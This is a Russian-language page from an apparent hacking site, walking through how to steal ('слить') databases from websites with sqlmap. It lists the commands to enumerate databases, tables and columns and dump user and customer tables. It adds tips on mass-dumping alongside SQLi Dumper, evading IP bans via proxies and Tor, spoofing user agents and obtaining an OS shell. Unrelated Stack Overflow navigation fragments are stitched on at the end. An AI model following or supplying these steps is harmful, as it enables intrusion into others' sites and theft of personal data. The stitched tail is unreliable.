Как слить базу с сайта


SQLMAP - Как слить базу ( урок на примере ) - Статьи | Уроки Хакинга - Хакерский - Софт* - Каталог файлов - HACK-PORT.RU

Это не мануал, гайд (итд), это просто пример как можно слить базу через SQLMAP на примере,писал сам так что не пинайте, а лучше добавьте свои советы и я их оставлю на главной .

Очень практично его использовать с SQLi Dumper, можно разом по несколько сайтов сливать.
Находим базу в Dumpere - проверяем - запускаем слив через SQLMAP, если нашли ещё базу то запускаем 2 консоль с SQLMAP итд.

 


Для быстрого запуска можно сделать ярлык на SQLMAP: создать ярлык - путь к объекту "cmd", в свойствах прописать путь к SQLMAP
Файл .bat

 

Скрытый контент.

Код:
cd C:\Python27\SQLmap
start cmd.exe

 

 

 

 Кто знаком с Havij или SQLi Dumper смысл будет понятен, задача найти:
1.База
2.Таблицы
3.Столбцы
4.Строки
5.Дамп
Приступим к работе:
1. sqlmap.py -u "ваша ссылка" --dbs (поверяем на наличие баз данных и тип SQL Injection) ссылка в " "

 

Вот базы которые мы нашли:

 

 

2. sqlmap.py -u "ваша ссылка" -D название базы --tables ( находим таблицы базы )

Смотрим найденные таблицы на наличие user,members,customers и т.д.

 

$IMAGE3$

 

3. sqlmap.py -u "ваша ссылка" -D название базы -T название таблицы --columns ( находим столбцы таблицы)

Вот и финальная инфа:

 

 

И так приступим к сливу базы
4. sqlmap.py -u "ваша ссылка" -D название базы -T название таблицы -C название колон (пишем через ,) --dump --threads=10

Пошел слив базы + ещё без паролей:

 

 

Плюшки:
1.Если слетел процесс то не парьтесь SQLMAP при следующим запуске дампа продолжит с места разрыва что уже огромный +
2.Ctrl+C Остановить процесс.
3.Ctrl+Z Пауза
4.Файлы с дампом найдете в C:\Users\XXXXXXXX\.sqlmap\output - сайт - дамп в CSV можно так же грузить shell (--os-shell ) на сайты но это уже другая тема и я ещё сам толком не всё понял.
5.USER AGENT можно добавить рандом по файлу txt или по ссылке.

 

Скрытый контент.

Код:
Рандом user agent
--random-agent
Из txt файла
--user-agent ./txt/user-agents.txt
По ссылке
--user-agent=Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)


Если бан по IP на сайте можно используя PROXY или сети TOR , VPN

 

Скрытый контент.

Код:
PROXY
-proxy=socks5://ваша прокси
TOR (нужно поставить vidalia)
Использование анонимную сеть TOR
--tor
--tor-порт = порт
--tor-type= тип прокси (HTTP (default), SOCKS5)


Можно добавить больше 10 потоков в lib/core/settings.py редактируем строку.

 

Скрытый контент.

Код:
# Maximum number of threads (avoiding connection issues and/or DoS) MAX_NUMBER_OF_THREADS = 10

 

sql - объединить несколько баз данных в единую базу данных

Переполнение стека
  1. Около
  2. Товары
  3. Для команд
  1. Переполнение стека Общественные вопросы и ответы
  2. Переполнение стека для команд Где разработчики и технологи делятся частными знаниями с коллегами
  3. Вакансии Программирование и связанные с ним технические возможности карьерного роста
  4. Талант Нанимайте технических специалистов и создавайте свой бренд работодателя
.

Как объединить две базы данных в SQL Server?

Переполнение стека
  1. Около
  2. Товары
  3. Для команд
  1. Переполнение стека Общественные вопросы и ответы
  2. Переполнение стека для команд Где разработчики и технологи делятся частными знаниями с коллегами
.

wordpress - Как лучше всего объединить базу данных разработки и производство?

Переполнение стека
  1. Около
  2. Товары
  3. Для команд
  1. Переполнение стека Общественные вопросы и ответы
  2. Переполнение стека для команд Где разработчики и технологи делятся частными знаниями с коллегами
.

php - Как объединить таблицы базы данных

Переполнение стека
  1. Около
  2. Товары
  3. Для команд
  1. Переполнение стека Общественные вопросы и ответы
  2. Переполнение стека для команд Где разработчики и технологи делятся частными знаниями с коллегами
  3. Вакансии Программирование и родственная техническая карьера:
.

Смотрите также

Поделиться в соц. сетях

Опубликовать в Facebook
Опубликовать в Одноклассники
Вы можете оставить комментарий, или ссылку на Ваш сайт.

Оставить комментарий